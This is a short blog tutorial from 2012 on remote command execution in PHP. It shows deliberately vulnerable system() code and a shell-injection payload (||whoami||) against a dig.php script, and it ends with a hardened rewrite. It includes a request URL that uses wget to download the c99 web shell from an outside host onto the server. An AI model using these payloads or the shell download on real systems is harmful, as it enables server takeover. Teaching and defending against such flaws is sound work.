Tuesday, July 31, 2012

Remote Command Execution



Remote Command Execution, like Remote Code Execution, is also called RCE. Just as the names are similar, the way the attack works is similar too. As the name says, Remote Command Execution means that commands can be executed remotely.

Code


<?php
// Deliberately vulnerable: the cmd query parameter goes straight to the shell.
$cmd = $_GET['cmd'];
system($cmd);
?>

If the code looks like this, then requesting www.site.com/index.php?cmd=whoami, i.e. passing the whoami command, will return the server's user name. There are other PHP functions that can execute commands in the same way.

These are:

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

That is the list.

Where the command goes, instead of passing a command like whoami, if a wget command such as wget http://www.sh3ll.org/c99.txt? -O shell.php is passed, the server fetches the shell and writes it out as a .php file.

www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php

To be honest, the example vulnerability above is too theoretical. Let's look at some that actually happened in practice.

Example 1 :

Code from dig.php


<?php
include("common.php");
showMenu();
echo '<br>';
$status = $_GET['status'];
$ns  = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip      = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
// start digging in the nameserver (all three values come unfiltered from the query string)
system ("dig @$ns $host $query_type");
echo '</pre>';
} else {   // excerpt: the surrounding if/else of the original dig.php is not shown here
?>

What we are interested in is just one small part: the part that allows Remote Command Execution.

$ns  = $_GET['ns'];
system ("dig @$ns $host $query_type");

Here the ns variable is not filtered at all, so an attacker can execute whatever command he likes.
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
Even though this tries to execute the whoami command, it will not actually run, because the code ends up like this:

system ("dig whoami ghostarea.net NS");

Since there is no such command, it will not work. So we have to think of another way: we will use the || operator that the terminal accepts.

www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging

Then the code becomes this:

system ("dig ||whoami|| ghostarea.net NS");

Written this way, it is separated from dig and from ghostarea.net NS, and it is executed as a command on its own.
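As an added example (not code from the original post or from dig.php), here is how the same fragment can be hardened: every parameter is validated against an allow-list before it is placed in the command, and escapeshellarg() is applied as a second layer. The resolver address and the is_valid_* helper names are assumptions for the demonstration.

```php
<?php
// Added hardened rewrite of the dig.php fragment (not the original project's code).
// Untrusted values are validated against an allow-list before reaching the shell.

const ALLOWED_QUERY_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'SOA', 'CNAME', 'ANY'];

// A host must be a DNS name: only letters, digits, dots and hyphens are allowed,
// so shell metacharacters such as |, ;, &, $, ` and spaces can never get through.
function is_valid_hostname(string $value): bool {
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($value) <= 253
        && preg_match('/^' . $label . '(\.' . $label . ')*$/', $value) === 1;
}

// A nameserver may be an IPv4 address or a DNS name.
function is_valid_nameserver(string $value): bool {
    return filter_var($value, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false
        || is_valid_hostname($value);
}

// Returns the command line to run, or null when any parameter is rejected.
function build_dig_command(array $params): ?string {
    $ns   = strtolower(trim($params['ns'] ?? ''));
    $host = strtolower(trim($params['host'] ?? ''));
    $type = strtoupper(trim($params['query_type'] ?? 'A'));

    if (!is_valid_nameserver($ns) || !is_valid_hostname($host)
        || !in_array($type, ALLOWED_QUERY_TYPES, true)) {
        return null;
    }
    // escapeshellarg() single-quotes each value; the allow-list already leaves
    // nothing to escape, but defence in depth is cheap here.
    return 'dig @' . escapeshellarg($ns) . ' '
         . escapeshellarg($host) . ' ' . escapeshellarg($type);
}

// Constructed inputs: a normal lookup and the ||whoami|| request from the post.
$requests = [
    'benign' => ['ns' => '8.8.8.8',    'host' => 'ghostarea.net', 'query_type' => 'NS'],
    'attack' => ['ns' => '||whoami||', 'host' => 'ghostarea.net', 'query_type' => 'NS'],
];

foreach ($requests as $label => $params) {
    $cmd = build_dig_command($params);
    echo $label, ': ', $cmd === null ? 'rejected before reaching system()' : $cmd, "\n";
}
```

Only the benign request produces a command line; the || payload is rejected by the allow-list and never reaches system().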

posted by negative thunder
copy from mhf
